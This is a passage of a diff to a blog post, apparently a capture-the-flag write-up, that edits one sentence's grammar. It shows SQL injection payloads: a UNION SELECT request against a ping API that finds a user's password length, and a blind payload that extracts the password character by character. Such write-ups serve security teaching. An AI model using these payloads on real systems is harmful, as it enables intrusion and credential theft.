0xDexter0us/blog/content/posts/ccc-h1ctf.md

 ```http
 https://ccc.h1ctf.com/2b5d2b11513d2c9b/api/ping/?id=-1%20UNION%20SELECT%204,'127.0.0.1',32%20from%20user%20where%20id=1%20and%20length(password)<22%20limit%201--
 ```
-Then we got result length of password, which is 21 characters.
+Then we got the result length of the password, which is 21 characters.
 So we now use the following payload to exfil the password via packet size character by character upto 21 characters :

 ```sql
 -1 UNION SELECT 4,'127.0.0.1',ascii(substring(password,1,1)) from user where id=1 --